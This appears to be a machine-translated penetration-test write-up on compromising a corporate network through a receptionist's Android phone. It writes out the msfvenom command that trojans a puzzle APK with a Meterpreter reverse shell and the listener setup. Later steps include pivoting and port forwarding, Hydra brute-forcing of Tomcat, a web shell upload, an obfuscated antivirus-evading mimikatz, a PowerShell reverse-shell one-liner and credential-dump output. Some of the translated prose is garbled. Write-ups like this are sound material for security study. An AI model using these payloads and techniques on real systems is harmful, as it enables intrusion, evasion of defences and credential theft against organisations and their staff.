Company Smartphone Security (a) - From APK to Golden Ticket: Initial Probing

Company Smartphone Security (A) - From APK to Golden Ticket: Initial Probing, Getting Domain Admin Access from an Android Smartphone, And More ...

This article describes the potential dangers of using a personal smart phone in an enterprise network, and these cases are typical after a real-life case has occurred. It turns out that it is not difficult to trick an employee into installing a malicious application, bypassing network protection, accessing corporate networks, elevating and obtaining confidential information.

In addition, it turns out that it is possible to bypass all protection mechanisms (including anti-virus software) without being discovered. An attacker could bypass this by using some of the system's native tools and publicly accessible scripts without having to rely too much on external tools.

This is what we often say KISS strategy (Keep It Simple Stupid)

It is pure coincidence that any of the following stories have any similarities with real events or real people.

background

Super Company hired our Penetrating Test Engineer to conduct a social engineering assessment of his staff in the area of ​​finding all ways to steal confidential information so that employees

During the internal meeting, we asked to visit Guest WiFi. Guest WiFi is subject to exclusive protection and therefore needs to be logged in, valid for only one day.

Once connected to WiFi, we started a quick scan with Fing from the iPhone: As a result, we found several Android devices - which apparently exceeded the number of corporate visitors. We think even company employees also use Guest WiFi. Maybe save their valuable data plan. In fact, the receptionist who gave us the login credentials was talking to WhatsApp when we asked how to access the internet.

Scene: There are two phones on the table, a neat desktop, a family of three photos.

After a brief chat, I learned that her daughter is four years old and very active, but can calm down as long as the smart phone with the game installed. Ah, now the kids ah ...

Attack description

Social engineering began with a small-scale fishing effort that failed despite its failure. We then found out that company staff were trained before we attacked and were very vigilant about attachments, downloads, etc. We did not start well.

So we decided to focus on the receptionist, our aim is to let her download Android applications for children, what is more interesting for children than the puzzle it, Kazakhstan we like jigsaw puzzles ah.

Finding the receptionist's email address is easy, and we've got an email with a link to the download page. We also added a two-dimensional code in the mail, just swipe like a picture to install it.

Very cute right! Our goal is very easy to install malicious Android application, the application is really a jigsaw puzzle, but hides inside a Meterpreter shell

Aiming at the smartphone

Create a malicious Android application is very simple, we downloaded a normal application, and then use msfvenom to inject the payload, which is meterpreter shell

msfvenom -x puzzle.apk -p android / meterpreter / reverse_tcp LHOST = LPORT = 443 -o /var/www/html/puzzle.apk

The reason for listening on port 443 is that port 443 and port 80 are usually standard ports that are licensed by the firewall

We believe this app can arouse enough interest from the receptionist and ignore warnings during installation

In our host, also opened a listener:

msf> use exploit / multi / handler

msf exploit (handler)> set payload android / meterpreter / reverse_tcp

payload => android / meterpreter / reverse_tcp

msf exploit (handler)> set lhost

lhost =>

msf exploit (handler)> set lport 443

lport => 443

msf exploit (handler)> exploit -j -z

[*] Started reverse TCP handler on: 443

In order to make use of the company staff will use the visitor WiFi for personal purposes, we also want to put an antenna near the company

Using Meterpreter

About 8:00 in the morning, I received the message msfconsole:

[*] Meterpreter session 1 opened (: 443 -> XXXX: 51990) at ...

Bingo! She installed and ran a malicious Android app and we now have a Meterpreter session

Now we need to know if she is connected to the company's WiFi network. IP test results show that it is connected from the cellular network, she may be on the way to the office, maybe her daughter is playing a jigsaw puzzle.

The conversation did not last long, and after a few minutes we lost the shell, but before 9:00 we received another Session:

[*] Meterpreter session 2 opened (: 443 -> KKKK: 61545) at ...

This IP is the company, indicating that she is connected to the company's WiFi network

So we started some preliminary exploration, in addition to a few smartphones, we only found a DNS server under a different subnet

meterpreter> ipconfig

...

Interface 9

============

Name: wlan0 - wlan0

Hardware MAC: 20: 6e: 9c: 75: 94: ba

IPv4 Address: 10.118.1.13

IPv4 Netmask: 255.255.255.0

IPv6 Address: fe80 :: 226e: 9cff: fe75: 94ba

IPv6 Netmask: ::

....

meterpreter> shell

Process 1 created.Channel 1 created.

getprop net.dns1

192.168.178.196

The guest WiFi network is on 10.118.1.0/24 and the DNS server is on another subnet

In order to access the subnet, we configured the route

exploit (handler)> route add 192.168.178.0 255.255.255.0 1

Nmap scanning can not be performed, so we did a quick ping scan using proxychains

msf auxiliary (socks4a)> use auxiliary / server / socks4a

msf auxiliary (socks4a)> show options

Module options (auxiliary / server / socks4a):

Name Current Setting Required Description

- ----- ---- ----

SRVHOST 0.0.0.0 yes The address to listen on

SRVPORT 1080 yes The port to listen on.

# Attacker proxychains nmap -sn 192.168.178.0/24 DNS network

Nmap scan report for 192.168.178.195

Host is up (0.15s latency).

Nmap scan report for 192.168.178.196

Host is up (0.22s latency).

The host responded to the ping scan

We went through a quick TCP scan again

msf exploit (handler)> use auxiliary / scanner / portscan / tcp

msf auxiliary (tcp)> set RHOSTS 192.168.178.195,196

msf auxiliary (tcp)> set RPORTS 1-1024

msf auxiliary (tcp)> run

[*] 192.168.178.195: - 192.168.178.195:80 - TCP OPEN

[*] 192.168.178.195: - 192.168.178.195:8080 - TCP OPEN

[*] 192.168.178.196: - 192.168.178.196:53 - TCP OPEN

This is our conjecture on the current network environment structure:

Aim at the intranet server

Host 192.168.178.195 opened ports 80 and 8080, and we ported the port locally to be able to analyze network traffic locally

meterpreter> portfwd add -L 127.0.0.1 -l 8001 -r 192.168.178.195 -p 80

meterpreter> portfwd add -L 127.0.0.1 -l 8002 -r 192.168.178.195 -p 8080

Port 80 exposes the company's phone book, and we still do not know why they are exposing the information on the visitor's network

Quick scan found no obvious loopholes, so we decided to check the next 8080 port

We encountered Apache Tomcat's basic authentication, using Hydra blasting, a few minutes later we use admin / password123456 login system

Now that we're in the Tomcat Admin console, this should be a firewall configuration error because neither the Tomcat Admin Console nor the company's Directory should be exposed on the guest network

We plan to upload a shell on Tomcat so we can interact with the underlying operating system. The server fingerprint shows that we are dealing with a Windows server.

We constructed the war-archive with the Laudanum Injectable Web Exploit Code, uploaded the waf file on the administration page, which contains:

cmd.jsp: Used to interact with cmd.exe

m.ps1: An obfuscated and kill free mimikatz.ps1 for grabbing passwords and hashes

Because of its flexibility, it's easy to confuse powershell scripts with several well-known obfuscation techniques. We've just changed some keywords, like changing Invoke-mimikatz to Invoke-mymy, and a few other tips for reference .

We also added Invoke-mymy -dumpcreds to the end of the file so that the functionality is executed directly

After uploading, we accessed cmd.jsp in the browser

Ha! The user is run as SYSTEM service privileges, we continue to collect information. First, to collect the environment variables:

Cmd / c set

The result is as follows:

ALLUSERSPROFILE = C: \ ProgramData

COMPUTERNAME = SRVINTRANET

USERDOMAIN = SUPERCOMPANY

USERNAME = SRVINTRANET $

Now we got the computer name SRVINTRANET, at the same time, it belongs to SUPERCOMPANY domain, perfect.

Continue to use systeminfo to retrieve other useful information:

Command: systeminfo

result:

Host Name: SRVINTRANET

OS Name: Microsoft Windows Server 2012 R2 Standard

OS Version: 6.3.9600 N / A Build 9600

OS Manufacturer: Microsoft Corporation

OS Configuration: Member Server

OS Build Type: Multiprocessor Free

Registered Owner: Windows User

...

Next is the domain controller

Command: cmd / c nltest / dclist: supercompany

result:

Get a list of DCs in domain 'supercompany' from '\\ SRVDC1'.

srvdc1.supercompany.local [PDC] [DS] Site: Default-First-Site-Name

srvdc2.supercompany.local [DS] Site: Default-First-Site-Name

The command completed successfully

This time Android device may have started to heat up, we need to move to a more suitable shell. Android devices are no longer suitable for our work.

Our golden rule is: Keep hidden and avoid anti-virus software. So we used PowerShell-based shell, hope SRVINTRANET can access the Internet bar.

Through the webshell Tomcat, we installed the Powershell back door, will perform one-way back to the order, at the same time our public network server with netcat listening port 80

$ s = $ c.GetStream (); [byte []] $ b = 0..65535 | cmd / c powershell -nop -c "$ c = New-Object Net.Sockets.TCPClient ('', 80) While ($ i = $ s.Read ($ b, 0, $ b.Length)) - ne 0) {; $ d = (New-Object -TypeName System.Text.ASCIIEncoding) .GetString ($ b, 0, $ i); $ sb = (IEX $ data 2> & 1 | Out-String); $ sb2 = $ sb + 'PS' + (pwd) .Path + '>'; $ sb = ([text .encoding] :: ASCII). GetBytes ($ sb2); $ s.Write ($ sb, 0, $ sb.Length);

$ s.Flush ()}; $ c.Close () "

What is the function of this script? It executes the following commands when starting PowerShell: Create a TCPClient object, connect back to our machine, open an I / O stream, and use InvokeExpression to execute the input

We are not so lucky this time, did not receive the reverse shell. This server may not be able to connect to the Internet, so we again turned to Tomcat's webshell, and installed the confused mimikatz

cmd / c powershell -executionpolicy bypass -fc: \ tomcat \ webapps \ cmd \ warfiles \ m.ps1

. #####. mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14

. ## ^ ##. "A La Vie, A L'Amour"

## / \ ## / * * *

## / / ## Benjamin DELPY `gentilkiwi` (benjamin@gentilkiwi.com)

'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)

'#####' with 20 modules * * * /

mimikatz (powershell) # sekurlsa :: logonpasswords

Authentication Id: 0; 191734 (00000000: 0002ecf6)

Session: Interactive from 1

User Name: Administrator

Domain: SRVINTRANET

Logon Server: SRVINTRANET

Logon Time: 2/17/2017 2:12:31 PM

SID: S-1-5-21-938204560-2839928776-2225904511-500

msv:

[00010000] CredentialKeys

* NTLM: 604603ab105adc8XXXXXXXXXXXXXXXXX

* SHA1: 7754ff505598bf3XXXXXXXXXXXXXXXXXXXXXXXXX

[00000003] Primary

* Username: Administrator

* Domain: SRVINTRANET

* NTLM: 604603ab105adc8XXXXXXXXXXXXXXXXX

* SHA1: 7754ff505598bf3XXXXXXXXXXXXXXXXXXXXXXXXX

tspkg:

wdigest:

* Username: Administrator

* Domain: SRVINTRANET

* Password: (null)

kerberos:

* Username: Administrator

* Domain: SRVINTRANET

* Password: (null)

ssp: KO

credman:

mimikatz (powershell) # exit

Bye!

We got the local administrator's password hashes, but no plaintext. This is because our target server is Windows Server 2012, and things changed after 2008, WDigest documents no longer plaintext (can not help but miss the good old days), credman is empty. In short, this finding is not bad.

We decided to find a server that had Internet access because we were still working on infiltration with an unstable Android phone.

Through the net view command, we have a list of available shared servers

Server Name Remark

-----------------

\\ SRVDC1 Domain controller PDC

\\ SRVDC2 [4] Domain Controller

\\ SRVWSUS Server WSUS

\\ SRVAV Server AV

\\ SRVFILE1 File Server

This is the real server network